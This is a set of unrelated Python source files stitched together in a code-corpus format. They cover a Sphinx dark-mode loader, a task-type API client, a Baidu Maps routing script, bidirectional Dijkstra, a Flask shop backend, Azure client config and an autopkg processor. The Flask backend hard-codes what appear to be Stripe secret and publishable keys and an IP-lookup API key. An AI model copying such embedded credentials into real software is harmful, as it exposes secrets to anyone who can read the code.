class DarkModeLoader:
def __init__(self):
self.config = None
def configure(self, app, config):
self.config = config
self.check_sphinx_theme()
if not self.config.html_static_path:
self.config.html_static_path = [
str(Path.joinpath(Path(__file__).resolve().parent, "static"))
]
else:
self.config.html_static_path.append(
str(Path.joinpath(Path(__file__).resolve().parent, "static"))
)
if not self.config.default_dark_mode:
self.load_default_theme("light")
self.load_css()
return
self.load_default_theme("dark")
self.load_css()
def check_sphinx_theme(self):
if not self.config.html_theme == "sphinx_rtd_theme":
self.config.html_theme = "sphinx_rtd_theme"
def load_default_theme(self, default_theme: str):
if not self.config.html_js_files:
self.config.html_js_files = [
"dark_mode_js/default_{default_theme}.js".format(
default_theme=default_theme
),
"dark_mode_js/theme_switcher.js",
]
else:
self.config.html_js_files.append(
"dark_mode_js/default_{default_theme}.js".format(
default_theme=default_theme
)
)
self.config.html_js_files.append("dark_mode_js/theme_switcher.js")
def load_css(self):
if "css_files" in self.config.html_context:
self.config.html_context["css_files"].append("_static/dark_mode_css/general.css")
self.config.html_context["css_files"].append("_static/dark_mode_css/dark.css")
return
if not self.config.html_css_files:
self.config.html_css_files = [
"dark_mode_css/general.css",
"dark_mode_css/dark.css",
]
else:
self.config.html_css_files.append("dark_mode_css/general.css")
self.config.html_css_files.append("dark_mode_css/dark.css")
|
py | 1a32e3c29a2e3b70435ca283c0ca304079820098 | """Base class for task type models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import dateutil.parser
from saltant.constants import HTTP_200_OK, HTTP_201_CREATED
from .resource import Model, ModelManager
class BaseTaskType(Model):
"""Base model for a task type.
Attributes:
id (int): The ID of the task type.
name (str): The name of the task type.
description (str): The description of the task type.
user (str): The user associated with the task type.
datetime_created (:class:`datetime.datetime`): The datetime when
the task type was created.
command_to_run (str): The command to run to execute the task.
environment_variables (list): The environment variables required
on the host to execute the task.
required_arguments (list): The argument names for the task type.
required_arguments_default_values (dict): Default values for the
task's required arguments.
manager (:class:`saltant.models.base_task_type.BaseTaskTypeManager`):
The task type manager which spawned this task type.
"""
def __init__(
self,
id,
name,
description,
user,
datetime_created,
command_to_run,
environment_variables,
required_arguments,
required_arguments_default_values,
manager,
):
"""Initialize a task type.
Args:
id (int): The ID of the task type.
name (str): The name of the task type.
description (str): The description of the task type.
user (str): The user associated with the task type.
datetime_created (:class:`datetime.datetime`): The datetime
when the task type was created.
command_to_run (str): The command to run to execute the task.
environment_variables (list): The environment variables
required on the host to execute the task.
required_arguments (list): The argument names for the task type.
required_arguments_default_values (dict): Default values for
the task's required arguments.
manager (:class:`saltant.models.base_task_type.BaseTaskTypeManager`):
The task type manager which spawned this task type.
"""
# Call parent constructor
super(BaseTaskType, self).__init__(manager)
self.id = id
self.name = name
self.description = description
self.user = user
self.datetime_created = datetime_created
self.command_to_run = command_to_run
self.environment_variables = environment_variables
self.required_arguments = required_arguments
self.required_arguments_default_values = (
required_arguments_default_values
)
def __str__(self):
"""String representation of the task type."""
return "%s (%s)" % (self.name, self.user)
def sync(self):
"""Sync this model with latest data on the saltant server.
Note that in addition to returning the updated object, it also
updates the existing object.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
This task type instance after syncing.
"""
self = self.manager.get(id=self.id)
return self
def put(self):
"""Updates this task type on the saltant server.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A task type model instance representing the task type
just updated.
"""
return self.manager.put(
id=self.id,
name=self.name,
description=self.description,
command_to_run=self.command_to_run,
environment_variables=self.environment_variables,
required_arguments=self.required_arguments,
required_arguments_default_values=(
self.required_arguments_default_values
),
)
class BaseTaskTypeManager(ModelManager):
"""Base manager for task types.
Attributes:
_client (:class:`saltant.client.Client`): An authenticated
saltant client.
list_url (str): The URL to list task types.
detail_url (str): The URL format to get specific task types.
model (:class:`saltant.models.resource.Model`): The model of the
task type being used.
"""
model = BaseTaskType
def get(self, id=None, name=None):
"""Get a task type.
Either the id xor the name of the task type must be specified.
Args:
id (int, optional): The id of the task type to get.
name (str, optional): The name of the task type to get.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A task type model instance representing the task type
requested.
Raises:
ValueError: Neither id nor name were set *or* both id and
name were set.
"""
# Validate arguments - use an xor
if not ((id is None) ^ (name is None)):
raise ValueError("Either id or name must be set (but not both!)")
# If it's just ID provided, call the parent function
if id is not None:
return super(BaseTaskTypeManager, self).get(id=id)
# Try getting the task type by name
return self.list(filters={"name": name})[0]
def create(
self,
name,
command_to_run,
description="",
environment_variables=None,
required_arguments=None,
required_arguments_default_values=None,
extra_data_to_post=None,
):
"""Create a task type.
Args:
name (str): The name of the task.
command_to_run (str): The command to run to execute the task.
description (str, optional): The description of the task type.
environment_variables (list, optional): The environment
variables required on the host to execute the task.
required_arguments (list, optional): The argument names for
the task type.
required_arguments_default_values (dict, optional): Default
values for the task's required arguments.
extra_data_to_post (dict, optional): Extra key-value pairs
to add to the request data. This is useful for
subclasses which require extra parameters.
Returns:
:class:`saltant.models.base_task_instance.BaseTaskType`:
A task type model instance representing the task type
just created.
"""
# Set None for optional list and dicts to proper datatypes
if environment_variables is None:
environment_variables = []
if required_arguments is None:
required_arguments = []
if required_arguments_default_values is None:
required_arguments_default_values = {}
# Create the object
request_url = self._client.base_api_url + self.list_url
data_to_post = {
"name": name,
"description": description,
"command_to_run": command_to_run,
"environment_variables": json.dumps(environment_variables),
"required_arguments": json.dumps(required_arguments),
"required_arguments_default_values": json.dumps(
required_arguments_default_values
),
}
# Add in extra data if any was passed in
if extra_data_to_post is not None:
data_to_post.update(extra_data_to_post)
response = self._client.session.post(request_url, data=data_to_post)
# Validate that the request was successful
self.validate_request_success(
response_text=response.text,
request_url=request_url,
status_code=response.status_code,
expected_status_code=HTTP_201_CREATED,
)
# Return a model instance representing the task type
return self.response_data_to_model_instance(response.json())
def put(
self,
id,
name,
description,
command_to_run,
environment_variables,
required_arguments,
required_arguments_default_values,
extra_data_to_put=None,
):
"""Updates a task type on the saltant server.
Args:
id (int): The ID of the task type.
name (str): The name of the task type.
description (str): The description of the task type.
command_to_run (str): The command to run to execute the task.
environment_variables (list): The environment variables
required on the host to execute the task.
required_arguments (list): The argument names for the task type.
required_arguments_default_values (dict): Default values for
the task's required arguments.
extra_data_to_put (dict, optional): Extra key-value pairs to
add to the request data. This is useful for subclasses
which require extra parameters.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A :class:`saltant.models.base_task_type.BaseTaskType`
subclass instance representing the task type just
updated.
"""
# Update the object
request_url = self._client.base_api_url + self.detail_url.format(id=id)
data_to_put = {
"name": name,
"description": description,
"command_to_run": command_to_run,
"environment_variables": json.dumps(environment_variables),
"required_arguments": json.dumps(required_arguments),
"required_arguments_default_values": json.dumps(
required_arguments_default_values
),
}
# Add in extra data if any was passed in
if extra_data_to_put is not None:
data_to_put.update(extra_data_to_put)
response = self._client.session.put(request_url, data=data_to_put)
# Validate that the request was successful
self.validate_request_success(
response_text=response.text,
request_url=request_url,
status_code=response.status_code,
expected_status_code=HTTP_200_OK,
)
# Return a model instance representing the task instance
return self.response_data_to_model_instance(response.json())
def response_data_to_model_instance(self, response_data):
"""Convert response data to a task type model.
Args:
response_data (dict): The data from the request's response.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A model instance representing the task type from the
response data.
"""
# Coerce datetime strings into datetime objects
response_data["datetime_created"] = dateutil.parser.parse(
response_data["datetime_created"]
)
# Instantiate a model for the task instance
return super(
BaseTaskTypeManager, self
).response_data_to_model_instance(response_data)
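# --- Illustrative sketch only (assumptions): `SomeTaskTypeManager` stands for a concrete
# subclass that sets `list_url`/`detail_url`, and `client` for an authenticated saltant
# client exposing `.base_api_url` and `.session`. All names below are placeholders. ---
#
#   manager = SomeTaskTypeManager(client)
#   task_type = manager.create(
#       name="say-hello",
#       command_to_run="echo hello",
#       required_arguments=["name"],
#       required_arguments_default_values={"name": "world"},
#   )
#   task_type.description = "Greets someone"
#   task_type.put()                       # push the edit back to the server
#   same = manager.get(name="say-hello")  # id XOR name, never both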
|
py | 1a32e4b486aa29929789db5ae26db2a69e173a14 | # -*- coding: utf-8 -*-
'''
This is an example that computes a driving origin-destination (OD) matrix from a set of origins to a set of targets; the parsed results are also saved to a local file.
'''
import pandas as pd
import json
import os
from BaiduMapAPI.api import SearchPlace, MapDirection
AK = os.environ["BaiduAK"]
SK = os.environ["BaiduSK"]
origins_data = pd.read_csv("data/exmaple_citydata_coords.csv", encoding="utf-8")
targets_name = {
"香港":"香港国际机场", "广州": "广州白云国际机场", "深圳":"深圳宝安国际机场",
"珠海":"珠海金湾国际机场", "澳门":"澳门国际机场", "佛山":"佛山沙堤机场",
"惠州":"惠州平潭机场"
}
place = SearchPlace(AK, SK)
dirction = MapDirection(AK, SK)
fw = open("driving_result.csv", "w", encoding="utf-8")
fw.write("origin, target, distance, duration, toll \n")
for name in targets_name:
pois = place.search(targets_name[name], region=name)
poi = pois[0]
loc = poi.get_location()
for i in origins_data.index:
coords = (round(origins_data["lat"][i],5),round(origins_data["lng"][i],5))
print(coords)
content = dirction.driving(loc, coords)
content = json.loads(content)
origin = origins_data["详细地址"][i]
target = targets_name[name]
# distance, duration and toll of the regular driving route
if "result" in content:
driving_distance = content["result"]['routes'][0]["distance"]
driving_duration = content["result"]['routes'][0]["duration"]
toll = content["result"]['routes'][0]["toll"]
fw.write("%s, %s, %s, %s, %s \n"%(origin, target, driving_distance, driving_duration, toll))
fw.close() |
py | 1a32e5e806cc87bb3d001badc1a82f26aa335c67 | """
Bidirectional search is a graph search algorithm that finds a shortest path from an initial vertex to a goal
vertex in a directed graph. It runs two simultaneous searches: one forward from the initial state,
and one backward from the goal, stopping when the two meet in the middle. [Wikipedia]
"""
import queue
def _visit(direction_queues, side, node, dist, length):
"""
Function for adding the length of a path to the appropriate queue
Args:
direction_queues: the two priority queues (forward and backward)
side: which side needs to be processed (from target or from source)
node: node itself
dist: distances array
length: length of the path
"""
if node not in dist[side] or dist[side][node] > length:
dist[side][node] = length
direction_queues[side].put((length, node))
def bidi_dijkstra(graph, start, target):
"""
Calculate the shortest path via Dijkstra's algorithm with a bidirectional optimization:
the search runs from both the start and the target node and switches between the two sides each step
Args:
graph: graph representation
start: start node
target: target node
Returns:
int: length of the shortest path between the start and target nodes
Examples:
>>> graph = prepare_weighted_undirect_graph(
...     [(1, 2, 7), (1, 3, 9), (1, 6, 14), (6, 3, 2), (6, 5, 9), (3, 2, 10),
...      (3, 4, 11), (2, 4, 15), (6, 5, 9), (5, 4, 6)])
>>> bidi_dijkstra(graph, 1, 6)
11
"""
dist = [dict(), dict()]
visits = [set(), set()]
direction_queues = [queue.PriorityQueue(), queue.PriorityQueue()]
_visit(direction_queues, 0, start, dist, 0)
_visit(direction_queues, 1, target, dist, 0)
nodes_process = [[], []]
flip_side = 0
while not direction_queues[0].empty() or not direction_queues[1].empty():
node = direction_queues[flip_side].get()[1]
for adjacent_node, edge_weigth in graph[node].items():
length = dist[flip_side][node] + edge_weigth
_visit(direction_queues, flip_side, adjacent_node, dist, length)
nodes_process[flip_side].append(node)
visits[flip_side].add(node)
if node in visits[flip_side ^ 1]:
return _calc_shortest_path(nodes_process, dist)
if not direction_queues[flip_side ^ 1].empty():
flip_side ^= 1
return -1
def _calc_shortest_path(nodes_process, dist):
"""
Calculate the length of the shortest path from the nodes processed on both sides
Args:
nodes_process: nodes processed during the forward and backward searches
dist: distances from the start (forward side) and from the target (backward side)
Returns:
int: length of the shortest path
"""
shortest_path = 10 ** 16
for node in nodes_process[1] + nodes_process[0]:
if node in dist[0] and node in dist[1] and dist[0][node] + dist[1][node] < shortest_path:
shortest_path = dist[0][node] + dist[1][node]
return shortest_path
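# --- Minimal runnable sketch (assumption): `prepare_weighted_undirect_graph` is not
# defined in this module, so the demo below builds the adjacency mapping it is
# expected to produce (node -> {neighbour: edge weight}) by hand. ---
if __name__ == "__main__":
    edges = [(1, 2, 7), (1, 3, 9), (1, 6, 14), (6, 3, 2), (6, 5, 9),
             (3, 2, 10), (3, 4, 11), (2, 4, 15), (5, 4, 6)]
    graph = {}
    for u, v, w in edges:
        # undirected graph: add the edge in both directions
        graph.setdefault(u, {})[v] = w
        graph.setdefault(v, {})[u] = w
    print(bidi_dijkstra(graph, 1, 6))  # expected: 11 (path 1 -> 3 -> 6)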
|
py | 1a32e64ef372e82e97e1bd6a8e79c4cbf33ac6b6 | import os
import sys
import stripe
import datetime
from flask import *
#import cloudinary as Cloud
#import cloudinary.uploader
from Backend.models import *
from Backend import db, bcrypt
from Backend.config import Config
from flask_cors import cross_origin
from Backend.ext import token_required
from Backend.registration.decorator import check_confirmed
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
auth = Blueprint('authorization', __name__)
stripe_keys = {
'secret_key': "sk_test_51IscUOBuSPNXczcenT31xOR1QnW6T2kPpfr0N3JKHvY7Idqb4oQUiOK245Azeac3VgUiN8nNT88vNf2VTkLIVebK00ZeQX3fm7",
'publishable_key': 'pk_test_51IscUOBuSPNXczceSfoIKAm7bARLi4fS9QZr5SNVOMa3aF7zlmIwmarG0fnc2ijpkn1WrVnrs9obt9zCTPihKiBe00tVxBVhKf',
}
stripe.api_key = stripe_keys['secret_key']
Message = "Problem uploading to the server... if the error persists, send a message to [email protected] to file a complaint"
try:
PYTHON_VERSION = sys.version_info[0]
if PYTHON_VERSION == 3:
import urllib.request
resource = urllib.request.urlopen('https://api.ipregistry.co/?key=0umiu3uyv8174l')
else:
import urlparse
resource = urlparse.urlopen('https://api.ipregistry.co/?key=0umiu3uyv8174l')
payload = resource.read().decode('utf-8')
location = json.loads(payload)['location']['country']['name']
country= str(location).lower()
except Exception:
# Fall back to a placeholder so later `country not in product.available_in` checks don't raise NameError
country = "unknown"
@auth.route('/config')
def get_publishable_key():
stripe_config = {'publicKey': stripe_keys['publishable_key']}
return jsonify(stripe_config)
@auth.route('/api/book/product/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def bookProduct(current_user, product_id):
product = Product.query.filter_by(id= product_id).first()
if country not in product.available_in:
return jsonify({
"message": "Product not available in your region"
})
booked = Store.query.filter_by(saved=current_user).first()
already_booked = Store.query.filter_by(saved=current_user).filter_by(stored_data=product.product_name).first()
if already_booked:
return jsonify({
"message": "Product already booked by you"
})
if not booked:
booked = Store(saved=current_user)
booked.stored_data = product.product_name
db.session.add(booked)
booked.stored_data = product.product_name
if not product:
return jsonify({
"message": "Product not found"
})
try:
product.sold = True
db.session.commit()
return jsonify({
"message": "Product has been booked"
})
except:
return jsonify({
"message": "Problem with our server... Try again"
}), 500
@auth.route('/api/my/booked')
@cross_origin()
@token_required
@check_confirmed
def myBooked(current_user):
store = Store.query.filter_by(saved=current_user).all()
data = []
for product_id in store:
products = Product.query.filter_by(product_name=product_id.stored_data).filter(Product.sold == True).all()
for product in products:
data.append({
'name': product.product_name,
'description': product.description,
"category": product.category,
"price": product.product_price,
"varieties": product.varieties,
"expires": product.expiry_date,
"rate": product.rate
})
return jsonify({
"data": data,
}), 200
@auth.route('/api/checkout/product', methods=['POST'])
@cross_origin()
def checkoutProduct():
data = request.get_json()
product = Product.query.filter_by(product_name = data['name']).first()
if not product :
return jsonify({
"message": "Product not available at the moment"
})
if country not in product.available_in:
return jsonify({
"message": "Product not available in your region"
})
elif product.sold == True:
return jsonify({
"message": "Product currently unavailable"
})
intent = stripe.PaymentIntent.create(
amount=product.product_price,
currency=product.currency
)
try:
return jsonify({
'clientSecret': intent['client_secret']
})
except Exception as e:
return jsonify(error=str(e)), 403
@auth.route('/api/add/to/cart/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def addToCart(current_user, product_id):
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "Product is not available at the moment"
})
if country not in product.available_in:
return jsonify({
"message": "Product not available in your region"
})
cart = Store.query.filter_by(saved=current_user).first()
already_booked = Store.query.filter_by(saved=current_user).filter_by(stored_data=product.product_name).first()
if already_booked:
return jsonify({
"message": "Product already in your cart"
})
try:
if not cart:
cart = Store(saved=current_user)
cart.stored_data = product.product_name
db.session.add(cart)
cart.stored_data = product.product_name
db.session.commit()
return jsonify({
"message": "Product successfully add to cart"
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/my/cart')
@cross_origin()
@token_required
@check_confirmed
def myStore(current_user):
store = Store.query.filter_by(saved=current_user).all()
data = []
for product_id in store:
products = Product.query.filter_by(product_name=product_id.stored_data).all()
for product in products:
data.append({'name': product.product_name,
'description': product.description,
"category": product.category,
"price": product.product_price,
"varieties": product.varieties,
"expires": product.expiry_date,
"rate": product.rate,
"currency": product.currency
})
return jsonify({
"data": data,
}), 200
@auth.route('/api/remove/from/cart/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def removeFromCart(current_user, product_id):
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "Product is not available at the moment"
})
store = Store.query.filter_by(saved=current_user).filter_by(stored_data=product.product_name).first()
if not store:
return jsonify({
"message": "product not in your cart"
})
try:
db.session.delete(store)
db.session.commit()
return jsonify({
"message": "Product successfully removed from cart"
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/rate/product/<int:product_id>', methods=['POST'])
@cross_origin()
def rate(product_id):
data = request.get_json()
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "product not available"
})
try:
product.rate =product.rate + int(data['rate'])
db.session.commit()
return jsonify({
"message": "Product has been rated"
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/add/comment/product/<int:product_id>', methods=['POST'])
@cross_origin()
@token_required
@check_confirmed
def addComment(current_user, product_id):
data = request.get_json()
product = Product.query.filter_by(id= product_id).first()
if not product:
return jsonify({
"message": "product not available"
})
try:
comment = Comment(thought=product)
comment.post = data['post']
db.session.add(comment)
db.session.commit()
return jsonify({
"message": "Comment on product has been posted "
})
except:
return jsonify({
"message": Message
})
@auth.route('/api/comments/product/<int:product_id>')
@cross_origin()
def comments(product_id):
product = Product.query.filter_by(id= product_id).first()
comment = Comment.query.filter_by(thought=product).all()
comment_schema = CommentSchema(many=True)
result = comment_schema.dump(comment)
return jsonify({
"data": result
}), 200
|
py | 1a32e6f2b2560917d2e3b36be397183dec848401 | import os
# Build a file path relative to the directory of the given file:
# os.path.dirname(curr_file) joined with the given path components.
def get_relative_path(curr_file, *path_components):
return os.path.join(os.path.dirname(curr_file), *path_components)
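# Minimal usage sketch: resolve a file that sits next to the calling module
# (the "data/config.json" path below is just an illustrative placeholder).
if __name__ == "__main__":
    print(get_relative_path(__file__, "data", "config.json"))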
|
py | 1a32e6f6b1fd16d23b052a21b669583a68e7148a | # -*- coding: utf-8 -*-
# Copyright (c) 2015, www.ossph.com and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class RepairOrderItems(Document):
pass
|
py | 1a32e73d6cbce332f1d80e368f8bcb874accbab5 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest import Configuration
from .version import VERSION
class LUISAuthoringClientConfiguration(Configuration):
"""Configuration for LUISAuthoringClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param endpoint: Supported Cognitive Services endpoints (protocol and
hostname, for example: https://westus.api.cognitive.microsoft.com).
:type endpoint: str
:param credentials: Subscription credentials which uniquely identify
client subscription.
:type credentials: None
"""
def __init__(
self, endpoint, credentials):
if endpoint is None:
raise ValueError("Parameter 'endpoint' must not be None.")
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
base_url = '{Endpoint}/luis/authoring/v3.0-preview'
super(LUISAuthoringClientConfiguration, self).__init__(base_url)
# Starting Autorest.Python 4.0.64, make connection pool activated by default
self.keep_alive = True
self.add_user_agent('azure-cognitiveservices-language-luis/{}'.format(VERSION))
self.endpoint = endpoint
self.credentials = credentials
|
py | 1a32e768d4ed1e7a445d9bb617a6dd802cba816f | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class AzureBareMetalHardwareTypeNamesEnum(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Name of the hardware type (vendor and/or their product name)
"""
CISCO_UCS = "Cisco_UCS"
HPE = "HPE"
class AzureBareMetalInstancePowerStateEnum(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Resource power state
"""
STARTING = "starting"
STARTED = "started"
STOPPING = "stopping"
STOPPED = "stopped"
RESTARTING = "restarting"
UNKNOWN = "unknown"
class AzureBareMetalInstanceSizeNamesEnum(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Specifies the AzureBareMetal instance SKU.
"""
S72_M = "S72m"
S144_M = "S144m"
S72 = "S72"
S144 = "S144"
S192 = "S192"
S192_M = "S192m"
S192_XM = "S192xm"
S96 = "S96"
S112 = "S112"
S224 = "S224"
S224_M = "S224m"
S224_OM = "S224om"
S224_OO = "S224oo"
S224_OOM = "S224oom"
S224_OOO = "S224ooo"
S384 = "S384"
S384_M = "S384m"
S384_XM = "S384xm"
S384_XXM = "S384xxm"
S448 = "S448"
S448_M = "S448m"
S448_OM = "S448om"
S448_OO = "S448oo"
S448_OOM = "S448oom"
S448_OOO = "S448ooo"
S576_M = "S576m"
S576_XM = "S576xm"
S672 = "S672"
S672_M = "S672m"
S672_OM = "S672om"
S672_OO = "S672oo"
S672_OOM = "S672oom"
S672_OOO = "S672ooo"
S768 = "S768"
S768_M = "S768m"
S768_XM = "S768xm"
S896 = "S896"
S896_M = "S896m"
S896_OM = "S896om"
S896_OO = "S896oo"
S896_OOM = "S896oom"
S896_OOO = "S896ooo"
S960_M = "S960m"
class AzureBareMetalProvisioningStatesEnum(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""State of provisioning of the AzureBareMetalInstance
"""
ACCEPTED = "Accepted"
CREATING = "Creating"
UPDATING = "Updating"
FAILED = "Failed"
SUCCEEDED = "Succeeded"
DELETING = "Deleting"
MIGRATING = "Migrating"
|
py | 1a32e81dc0cae1078e77b758d3d93ed0d26a4cc0 | #!/usr/bin/env python
#
# Copyright 2010 Per Olofsson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
import subprocess
import FoundationPlist
import math
from xml.etree import ElementTree
from autopkglib import Processor, ProcessorError
__all__ = ["PkgInfoCreator"]
class PkgInfoCreator(Processor):
description = "Creates an Info.plist file for a package."
input_variables = {
"template_path": {
"required": True,
"description": "An Info.plist template.",
},
"version": {
"required": True,
"description": "Version of the package.",
},
"pkgroot": {
"required": True,
"description": "Virtual root of the package.",
},
"infofile": {
"required": True,
"description": "Path to the info file to create.",
},
"pkgtype": {
"required": True,
"description": "'flat' or 'bundle'."
}
}
output_variables = {
}
__doc__ = description
def find_template(self):
'''Searches for the template, looking in the recipe directory
and parent recipe directories if needed.'''
template_path = self.env['template_path']
if os.path.exists(template_path):
return template_path
elif not template_path.startswith("/"):
recipe_dir = self.env.get('RECIPE_DIR')
search_dirs = [recipe_dir]
if self.env.get("PARENT_RECIPES"):
# also look in the directories containing the parent recipes
parent_recipe_dirs = list(set([
os.path.dirname(item)
for item in self.env["PARENT_RECIPES"]]))
search_dirs.extend(parent_recipe_dirs)
for directory in search_dirs:
test_item = os.path.join(directory, template_path)
if os.path.exists(test_item):
return test_item
raise ProcessorError("Can't find %s" % template_path)
def main(self):
if self.env['pkgtype'] not in ("bundle", "flat"):
raise ProcessorError("Unknown pkgtype %s" % self.env['pkgtype'])
template = self.load_template(self.find_template(), self.env['pkgtype'])
if self.env['pkgtype'] == "bundle":
self.create_bundle_info(template)
else:
self.create_flat_info(template)
restartaction_to_postinstallaction = {
"None": "none",
"RecommendRestart": "restart",
"RequireLogout": "logout",
"RequireRestart": "restart",
"RequireShutdown": "shutdown",
}
def convert_bundle_info_to_flat(self, info):
pkg_info = ElementTree.Element("pkg-info")
pkg_info.set("format-version", "2")
for bundle, flat in (("IFPkgFlagDefaultLocation", "install-location"),
("CFBundleShortVersionString", "version"),
("CFBundleIdentifier", "identifier")):
if bundle in info:
pkg_info.set(flat, info[bundle])
if "IFPkgFlagAuthorizationAction" in info:
if info["IFPkgFlagAuthorizationAction"] == "RootAuthorization":
pkg_info.set("auth", "root")
else:
pkg_info.set("auth", "none")
if "IFPkgFlagRestartAction" in info:
pkg_info.set("postinstall-action",
self.restartaction_to_postinstallaction[info["IFPkgFlagRestartAction"]])
payload = ElementTree.SubElement(pkg_info, "payload")
if "IFPkgFlagInstalledSize" in info:
payload.set("installKBytes", str(info["IFPkgFlagInstalledSize"]))
return ElementTree.ElementTree(pkg_info)
postinstallaction_to_restartaction = {
"none": "None",
"logout": "RequireLogout",
"restart": "RequireRestart",
"shutdown": "RequireShutdown",
}
    def convert_flat_info_to_bundle(self, flat_info):
        # Bundle-style defaults; values read from the flat PackageInfo tree are merged in below.
        info = {
#"CFBundleIdentifier": "com.adobe.pkg.FlashPlayer",
"IFPkgFlagAllowBackRev": False,
#"IFPkgFlagAuthorizationAction": "RootAuthorization",
#"IFPkgFlagDefaultLocation": "/",
"IFPkgFlagFollowLinks": True,
"IFPkgFlagInstallFat": False,
"IFPkgFlagIsRequired": False,
"IFPkgFlagOverwritePermissions": False,
"IFPkgFlagRelocatable": False,
#"IFPkgFlagRestartAction": "None",
"IFPkgFlagRootVolumeOnly": False,
"IFPkgFlagUpdateInstalledLanguages": False,
"IFPkgFormatVersion": 0.1,
}
        pkg_info = flat_info.getroot()
if pkg_info.tag != "pkg-info":
raise ProcessorError("PackageInfo template root isn't pkg-info")
info["CFBundleShortVersionString"] = pkg_info.get("version", "")
info["CFBundleIdentifier"] = pkg_info.get("identifier", "")
info["IFPkgFlagDefaultLocation"] = pkg_info.get("install-location", "")
if pkg_info.get("auth") == "root":
info["IFPkgFlagAuthorizationAction"] = "RootAuthorization"
else:
raise ProcessorError("Don't know how to convert auth=%s to Info.plist format" % pkg_info.get("auth"))
info["IFPkgFlagRestartAction"] = \
self.postinstallaction_to_restartaction[pkg_info.get("postinstall-action", "none")]
        payload = pkg_info.find("payload")
        if payload is not None:
            info["IFPkgFlagInstalledSize"] = payload.get("installKBytes", 0)
return info
def load_template(self, template_path, template_type):
"""Load a package info template in Info.plist or PackageInfo format."""
if template_path.endswith(".plist"):
# Try to load Info.plist in bundle format.
try:
                info = FoundationPlist.readPlist(template_path)
except BaseException as e:
raise ProcessorError("Malformed Info.plist template %s" % self.env['template_path'])
if template_type == "bundle":
return info
else:
return self.convert_bundle_info_to_flat(info)
else:
# Try to load PackageInfo in flat format.
try:
info = ElementTree.parse(template_path)
except BaseException as e:
raise ProcessorError("Malformed PackageInfo template %s" % self.env['template_path'])
if template_type == "flat":
return info
else:
return self.convert_flat_info_to_bundle(info)
def get_pkgroot_size(self, pkgroot):
"""Return the size of pkgroot (in kilobytes) and the number of files."""
size = 0
nfiles = 0
for (dirpath, dirnames, filenames) in os.walk(pkgroot):
# Count the current directory and the number of files in it.
nfiles += 1 + len(filenames)
for filename in filenames:
path = os.path.join(dirpath, filename)
# Add up file size rounded up to the nearest 4 kB, which
# appears to match what du -sk returns, and what PackageMaker
# uses.
size += int(math.ceil(float(os.lstat(path).st_size) / 4096.0))
return (size, nfiles)
def create_flat_info(self, template):
info = template
pkg_info = info.getroot()
if pkg_info.tag != "pkg-info":
raise ProcessorError("PackageInfo root should be pkg-info")
pkg_info.set("version", self.env['version'])
payload = pkg_info.find("payload")
if payload is None:
payload = ElementTree.SubElement(pkg_info, "payload")
size, nfiles = self.get_pkgroot_size(self.env['pkgroot'])
payload.set("installKBytes", str(size))
payload.set("numberOfFiles", str(nfiles))
info.write(self.env['infofile'])
def create_bundle_info(self, template):
info = template
info["CFBundleShortVersionString"] = self.env['version']
ver = self.env['version'].split(".")
info["IFMajorVersion"] = ver[0]
info["IFMinorVersion"] = ver[1]
size, nfiles = self.get_pkgroot_size(self.env['pkgroot'])
info["IFPkgFlagInstalledSize"] = size
try:
FoundationPlist.writePlist(info, self.env['infofile'])
except BaseException as e:
raise ProcessorError("Couldn't write %s: %s" % (self.env['infofile'], e))
if __name__ == '__main__':
processor = PkgInfoCreator()
processor.execute_shell()
|
py | 1a32e87d929ad042f78c1c6e0c0fbaec593762c8 | # SPDX-License-Identifier: Apache-2.0
#
# The OpenSearch Contributors require contributions made to
# this file be licensed under the Apache-2.0 license or a
# compatible open source license.
from typing import Any
from manifests.component_manifest import ComponentManifest, Components, Component
"""
A BuildManifest is an immutable view of the outputs from a build step
The manifest contains information about the product that was built (in the `build` section),
and the components that made up the build in the `components` section.
